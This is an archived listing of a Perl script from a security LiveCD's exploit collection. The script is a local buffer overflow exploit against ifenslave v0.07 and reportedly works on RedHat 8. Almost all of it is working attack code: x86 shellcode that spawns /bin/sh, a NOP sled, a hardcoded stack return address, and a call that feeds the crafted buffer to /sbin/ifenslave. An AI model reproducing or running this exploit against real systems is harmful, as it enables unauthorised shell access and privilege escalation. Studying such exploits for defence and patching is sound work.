home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / network / ifenslave / expl-ifenslave.pl < prev    next >
Perl Script  |  2005-02-12  |  889b  |  37 lines

  1. #!/usr/bin/perl
  2. #
  3. # expl-ifenslave.pl : Local buffer overflow exploit for
  4. #                     ifsenslave v0.07
  5. #
  6. # Exploit tested on RedHat 8
  7. #
  8. # Author :
  9. #    jlanthea [contact@jlanthea.net]
  10. #
  11. # Syntax :
  12. #    perl expl-ifenslave.pl  # works for me with offset = -17
  13.  
  14. $shellcode =
  15.         "\xeb\x1d\x5e\x29\xc0\x88\x46\x07\x89\x46\x0c\x89\x76\x08\xb0".
  16.         "\x0b\x87\xf3\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\x29\xc0\x40\xcd".
  17.         "\x80\xe8\xde\xff\xff\xff/bin/sh";
  18.  
  19. $offset = "0";
  20.  
  21. if(@ARGV == 1) { $offset = $ARGV[0]; }
  22. $nop     = "\x90";
  23. $esp     = 0xbffff480;
  24.  
  25. for ($i = 0; $i < (48 - (length($shellcode)) - 4); $i++) {
  26.     $buffer .= "$nop";
  27.     }
  28.  
  29. $buffer .= $shellcode;
  30. $buffer .= pack('l', ($esp + $offset));
  31.  
  32. print("Ifenslave local exploit by jlanthea - 2003\n");
  33. print("The new return address: 0x", sprintf('%lx',($esp + $offset)),
  34. "\n");
  35. exec("/sbin/ifenslave '$buffer'");
  36.  
  37.